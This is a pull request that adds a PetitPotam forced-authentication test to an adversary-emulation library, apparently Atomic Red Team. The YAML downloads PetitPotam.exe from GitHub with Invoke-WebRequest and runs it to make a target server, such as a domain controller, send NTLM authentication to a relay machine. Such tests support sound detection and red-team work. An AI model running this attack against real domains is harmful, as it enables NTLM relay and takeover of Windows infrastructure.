### PR TITLE
Add PetitPotam coerce authentication attack

### DIFF
--- a/atomics/T1187/T1187.yaml
+++ b/atomics/T1187/T1187.yaml
@@ -1,0 +1,44 @@
+attack_technique: T1187
+display_name: Forced Authentication
+atomic_tests:
+- name: PetitPotam
+  auto_generated_guid: 485ce873-2e65-4706-9c7e-ae3ab9e14213
+  description: |
+    This module runs the Windows executable of PetitPotam in order to coerce authentication for a remote system.
+  supported_platforms:
+  - windows
+  input_arguments:
+    captureServerIP:
+      description: Computer IP to use to receive the authentication (ex. attacker machine used for NTLM relay)
+      type: string
+      default: 10.0.0.3
+    targetServerIP:
+      description: Computer IP to force authentication from (ex. domain controller)
+      type: string
+      default: 10.0.0.2
+    efsApi:
+      description: EFS API to use to coerce authentication
+      type: string
+      default: 1
+    petitpotam_path:
+      description: PetitPotam Windows executable
+      type: path
+      default: '$env:TEMP\PetitPotam.exe'
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      PetitPotam binary must exist on disk and at specified location (#{petitpotam_path})
+    prereq_command: |
+      $petitpotam_path = cmd /c echo #{petitpotam_path}
+      if (Test-Path $petitpotam_path) { exit 0 } else { exit 1 }
+    get_prereq_command: |
+      $petitpotam_path = cmd /c echo #{petitpotam_path}
+      Invoke-WebRequest "https://github.com/topotam/PetitPotam/blob/main/PetitPotam.exe?raw=true" -OutFile $petitpotam_path
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      & "#{petitpotam_path}" #{captureServerIP} #{targetServerIP} #{efsApi}
+      Write-Host "End of PetitPotam attack"
+    cleanup_command: |
+      Remove-Item #{petitpotam_path}


### PR DESCRIPTION
**Details:**
PetitPotam (https://github.com/topotam/PetitPotam) is used to coerce authentication to a remote system (mostly DCs in the news recently).
This seems interesting to add the support of this attack to ART.

This is based on the Windows binary that is provided by the author on Github, not on the Python version (as such, the unauthenticated part cannot be tested here because this binary uses implicit authentication). Support for various other EFS functions was added in a second step and the options in this ART attack technique reflect that.

**Testing:**
Local testing.

**Associated Issues:**
N.A.